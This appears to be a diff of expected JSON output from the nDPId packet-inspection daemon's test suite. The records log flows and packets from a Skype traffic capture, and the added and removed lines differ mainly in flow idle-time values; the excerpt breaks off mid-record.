-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431969715510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715510,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3TdAAEAGS\/3AqAEiR+4Hy8PFSU9+U7C+AAAAALAC\/\/8DrQAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAKktAAEAGjc3AqAEiBfi63cPGeSKEqukYAAAAALAC\/\/8kCwAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAylVAAEAGNVvAqAEiVh8jHsPH6OX+Qs16AAAAALAC\/\/+d5AAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431969715594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969715594,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OFdAAHEGll1WHyMewKgBIujlw8c9omIw\/kLNe6ASIADqygAAAgQFrAEDAwgEAggKABoEJj4jp4I="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431969715594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715594,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XmBAAEAGoVzAqAEiVh8jHsPH6OX+Qs17PaJiMYAQECwpEwAAAQEICj4jp9MAGgQm"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431969715635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715635,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzWBAAHIGuLcF+LrdwKgBInkiw8ZD4gQbhKrpGbASRBB8ngAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431969715635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715635,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wlBAAEAG9dPAqAEiBfi63cPGeSKEqukZQ+IEHIAQECwLJwAAAQEICj4jp\/sAAAAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431969715739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715739,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9cxAAHMGAGhH7gfLwKgBIklPw8W6q5ekflOwv7AS\/\/+V\/QAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431969715739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715739,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iyZAAEAGnhrAqAEiR+4Hy8PFSU9+U7C\/uquXpYAQECzgEQAAAQEICj4jqF8AAAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716015,"flow_last_seen":1431969716015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716015,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431969716015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716015,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfGpAAEAGXaPAqAEiUVNNjcPJROc2X9vGAAAAALAC\/\/\/T7gAAAgQFtAEDAwUBAQgKPiOpaQAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431969716076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969716076,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8egBAAHQGLBFRU02NwKgBIkTnw8naYr1gNl\/bx6ASIACSowAAAgQFrAEDAwgEAggKALqZxj4jqWk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431969716076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716076,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0B4NAAEAG0pbAqAEiUVNNjcPJROc2X9vH2mK9YYAQECzRAwAAAQEICj4jqaIAupnG"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716182,"flow_last_seen":1431969716182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716182,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431969716182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716182,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3FAAEAG8D7AqAEiUYUTucPKrY8W93X3AAAAALAC\/\/8pggAAAgQFtAEDAwUBAQgKPiOqBgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431969716265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAivNAADAGmLxRhRO5wKgBIq2Pw8rX0EaLFvd1+LAS\/\/\/WdwAAAgQFrAEDAwUBAQgKArAx9T4jqgYEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431969716265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OVVAAEAG2mbAqAEiUYUTucPKrY8W93X419BGjIAQECwFxAAAAQEICj4jqlUCsDH1"} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1914,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715511,"flow_last_seen":1431969716485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":3431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1431969716485,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431969714962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714962,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8ec1AAHQGLERRU02NwKgBIkTnw8TZuiW6vWlWIaASIAAuPAAAAgQFrAEDAwgEAggKALqZVz4jpS8="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431969714962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714962,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PRZAAEAGnQPAqAEiUVNNjcPEROe9aVYh2bolu4AQECxsmQAAAQEICj4jpWsAuplX"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715510,"flow_last_seen":1431969715510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715510,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431969715510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715510,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3TdAAEAGS\/3AqAEiR+4Hy8PFSU9+U7C+AAAAALAC\/\/8DrQAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAKktAAEAGjc3AqAEiBfi63cPGeSKEqukYAAAAALAC\/\/8kCwAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAylVAAEAGNVvAqAEiVh8jHsPH6OX+Qs16AAAAALAC\/\/+d5AAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431969715594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969715594,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OFdAAHEGll1WHyMewKgBIujlw8c9omIw\/kLNe6ASIADqygAAAgQFrAEDAwgEAggKABoEJj4jp4I="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431969715594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715594,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XmBAAEAGoVzAqAEiVh8jHsPH6OX+Qs17PaJiMYAQECwpEwAAAQEICj4jp9MAGgQm"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431969715635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715635,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzWBAAHIGuLcF+LrdwKgBInkiw8ZD4gQbhKrpGbASRBB8ngAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431969715635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715635,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wlBAAEAG9dPAqAEiBfi63cPGeSKEqukZQ+IEHIAQECwLJwAAAQEICj4jp\/sAAAAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431969715739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715739,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9cxAAHMGAGhH7gfLwKgBIklPw8W6q5ekflOwv7AS\/\/+V\/QAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431969715739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715739,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iyZAAEAGnhrAqAEiR+4Hy8PFSU9+U7C\/uquXpYAQECzgEQAAAQEICj4jqF8AAAAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716015,"flow_last_seen":1431969716015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716015,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431969716015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716015,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfGpAAEAGXaPAqAEiUVNNjcPJROc2X9vGAAAAALAC\/\/\/T7gAAAgQFtAEDAwUBAQgKPiOpaQAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431969716076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969716076,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8egBAAHQGLBFRU02NwKgBIkTnw8naYr1gNl\/bx6ASIACSowAAAgQFrAEDAwgEAggKALqZxj4jqWk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431969716076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716076,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0B4NAAEAG0pbAqAEiUVNNjcPJROc2X9vH2mK9YYAQECzRAwAAAQEICj4jqaIAupnG"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716182,"flow_last_seen":1431969716182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716182,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431969716182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716182,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3FAAEAG8D7AqAEiUYUTucPKrY8W93X3AAAAALAC\/\/8pggAAAgQFtAEDAwUBAQgKPiOqBgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431969716265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAivNAADAGmLxRhRO5wKgBIq2Pw8rX0EaLFvd1+LAS\/\/\/WdwAAAgQFrAEDAwUBAQgKArAx9T4jqgYEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1431969716265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716265,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OVVAAEAG2mbAqAEiUYUTucPKrY8W93X419BGjIAQECwFxAAAAQEICj4jqlUCsDH1"} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1914,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715511,"flow_last_seen":1431969716485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":3431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1431969716485,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1431969716797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969716797,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISY\/IAAEARUx\/AqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1431969716797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969716797,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISf8oAAEARdJ\/AqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MT